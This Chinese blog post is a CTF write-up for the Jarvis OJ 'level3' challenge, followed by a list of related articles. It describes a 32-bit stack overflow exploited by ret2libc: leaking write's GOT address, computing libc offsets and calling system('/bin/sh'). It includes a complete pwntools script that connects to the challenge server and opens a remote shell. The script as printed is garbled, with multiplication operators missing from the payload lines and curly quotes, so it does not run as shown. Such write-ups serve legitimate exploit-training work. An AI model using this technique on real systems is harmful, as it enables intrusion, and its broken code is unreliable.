level3

最新推荐文章于 2022-06-18 22:14:07 发布
最新推荐文章于 2022-06-18 22:14:07 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: 新知识
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44832048/article/details/97407167
版权

level 3

 在终端中输入file level3  查看为32位,

checksec level3命令,发现栈是不受保护,

在IDA中查看伪代码,

很明显的栈溢出漏洞,但是没有system函数和/bin/sh字符串,只有一个write函数,泄露函数got表中的地址获取到库中某个函数的真正加载地址,通过偏移找出函数的库,通过然后找出其他函数的真正加载地址,包括system函数也包括/bin/sh字符串,

构造payload: payload=’A’0x88+’A’4+p32(plt_write)+p32(main_addr)+p32(1)+p32(got_write)+p32(4)

32(1),p32(4),与write函数在GOT表中的地址共同组成write函数的三个参数,

 

可以看出buf需要填充的字符是88的大小,由于是32位所以,‘A’*4

p32(plt_write)是write函数在plt表中的地址,因为调用一个函数相当于开辟一个新的栈,所以需要再返回一个函数地址指向main函数。。

要得到偏移量我们首先要的到某个函数在got表中储存的真实地址(本题在level3里的函数的地址,我看做libc库函数地址的一个映射),

偏移量就是got表里储存的地址与libc库函数地址的一个映射。。

用libc在ida中打开,找到write函数,双击就能得到libc中write函数的地址。

 

write函数在plt表中的地址,在level3中打开,

 

脚本如下:

 

from pwn import *
p=remote(“pwn2.jarvisoj.com”,9879)
e=ELF(“level3”)
libc=ELF(“libc-2.19.so”)
writ_a=e.symbols[‘write’]
rea=0x08048484
got_write=e.got[‘write’]

p.recv()
payload=(0x88+4)‘A’+p32(writ_a)+p32(rea)+p32(1)+p32(got_write)+p32(4)
p.send(payload)
aaa=p.recv(4)
true_write=u32(aaa)
print hex(true_write)
x=true_write-libc.symbols[‘write’]
true_bin=x+libc.search("/bin/sh").next()
true_sys=x+libc.symbols[‘system’]
payload=(0x88+4)‘A’+p32(true_sys)+p32(0)+p32(true_bin)
p.send(payload)
p.interactive()

 

脚本写好后,在桌面下Python 脚本名字

然后ls 最后cat出flag,

 

 

 

 

 

南吕十七
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Level3-1.rar
03-20
UiPath Level3 第一个练习的项目,这个是已经通过的。可以直接使用。2020年3月刚刚通过的。
UiPath-Level3-test1
07-16
UiPath学习官网https://academy.uipath.com/learn,课程Level 3 - Advanced Training中2. Calculate Client Security Hash的2. Assignment no. 1 Assignment答案
[攻防世界]level3
逆向萌新的博客
06-18 372
[攻防世界]level3,详细
level3的wp
wuyvle的博客
02-01 302
level3 用Linux康康,这是个压缩文件啊,解压康康 居然是个libc,有意思 先康康level3,是个32位,没有金丝雀 给了个buf,康康堆栈 可溢出,但是我们发现没有system函数,但是我们有libc 可以通过libc泄露system函数地址,虽然与原文件地址不一样,但是libc的write函数和system函数之间的地址差是一样的 写脚本 #导入pwn模块 from pwn import * #获取远程进程对象 p=remote('111.198.29.45',41496) #获取
UiPath-Level3-test2
07-16
UiPath学习官网https://academy.uipath.com/learn,课程Level 3 - Advanced Training中3. Generate Yearly Report的3. Assignment no. 2Assignment答案
level3第二个练习.zip
11-12
"level3第二个练习.zip"是一个针对这一级别的练习项目,旨在帮助学习者深化对UiPath平台的理解和操作能力。 UiPath是一款领先的企业级RPA平台,它提供了丰富的工具和功能,让自动化工程师能够构建、部署和管理自动...
CFA Level 3 Morning Session Essay Q+A 2007-2016.zip
07-04
《CFA Level 3晨间环节论文式问答2007-2016》是针对CFA(特许金融分析师)三级考试的重要复习资源。CFA考试是全球范围内金融行业认可度极高的资格认证,旨在提升金融专业人员的专业能力和道德标准。CFA Level 3作为...
level3 练习First.zip
11-13
在本文中,我们将深入探讨与"Level3 练习First.zip"相关的IT知识,特别是针对Uipath RPA(Robotic Process Automation)平台的第三级技能。Uipath是一款广泛使用的自动化工具,专为实现企业流程自动化而设计,帮助...
APNDroid API Level 3
03-16
APNDroid API Level 3是针对Android开发的一款高级框架,主要针对的是Android 1.5 SDK或更高版本的系统。这个框架特别强调了Widget相关的技术实现,为开发者提供了丰富的示例,有助于理解和应用Android平台上的小...
RPA UiPath level3第一个练习,项目
06-25
UiPath Level3 第一个练习的项目,这个是已经通过的。可以直接使用,里面有说明文档。有疑问可以@我
UiPath 官网Level 1 Lesson3题库
03-03
RPA 流程机器 人 UiPath官网Level1 课程 Lesson3 99%题库
RPA UiPath Level3 第二部分项目.zip
07-16
这个是RPA Level3 第二个练习的完成项目,这个项目运行的有点慢,程序上有点问题,但是可以过。需要注意的是,acme中的数据要重置,项目跑完提交后,没有出分数前,不要重置数据
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 496
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
python基础学习之城市三级菜单(3level_meums)应用实例
Jack__Tu小纪
07-16 189
初级版: ! 代码的解释器,不能放在for里面   data = { '北京':{ "昌平":{ "沙河":["oldboy","test"], "天通苑":["链家地产","我爱我家"] }, "朝阳":{ &qu
UiPath中国区交流群 uipath level3 poc考试交流
zf5848026的博客
02-19 3569
UiPath中国区交流群 近期公司让考UiPath证书,查来查资料甚少,建了个群,分享一些资料 有需要的进来吧 QQ群号:729423282
UiPath Level3讲解
aiyaojian9437的博客
09-12 804
匠厂出品,必属精品 Uipath中文社区qq交流群:4656303241 uipath中文交流社区:https://uipathbbs.com RPA之家qq群:465620839 第一课--UiPath Level3 框架讲解 https://ke.qq.com/course/443058?taid=3645267593577138 第二课--UiPath Level3 ...
CTF|pwn栈溢出入门题level3解题思路及个人总结
skyattractive的博客
06-02 2302
CTF|pwn栈溢出入门题level3解题思路及个人总结 解题思路 拿到题目将文件下载下来拖入ubuntu 发现这一次的文件比较特殊:是一个linux环境下的压缩包,自然而然想到的是解压它 通过命令行tar -xvf level.tar 将其解压出来 发现有两个文件:level和libc 都拖入IDA 特殊的地方在:本题没有直接给出system和bin/sh的位置,但是文件中有个write函数可以利用 我们IDA打开libc文件(关于libc文件是什么有什么 会在总结写到) 总体思路为:我们通过r
Uipath Level3的一些基础问题解决
S_Watermelon_avi的博客
02-28 3847
问题 level3需要我们做什么? level3过后对我们有什么好处? level3第一个练习需要干嘛? level3第二个练习需要干嘛? 回答 level3主要是我们对与学习uipath的一个成果检验,主要需要完成2个练习,第一个练习主要需要录屏,展示你的程序运行的过程,第二个练习主要是需要你运行你的程序以后的测试网站上的结果正确率,最后可以录屏,也可以上传代码! level3主要是让你能...
SAPAG2001: 4.6C系统中的LO715 PA Level3课程详情
"SAP AG2001课程资料,涉及LO715 MM PA Level3模块,系统环境为4.6C版本,发布于2001年7月,物料编号50046438。此外,文档强调所有权利已受保护,并指出其中包含的信息可能未经许可不得复制或用于任何目的,且信息...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值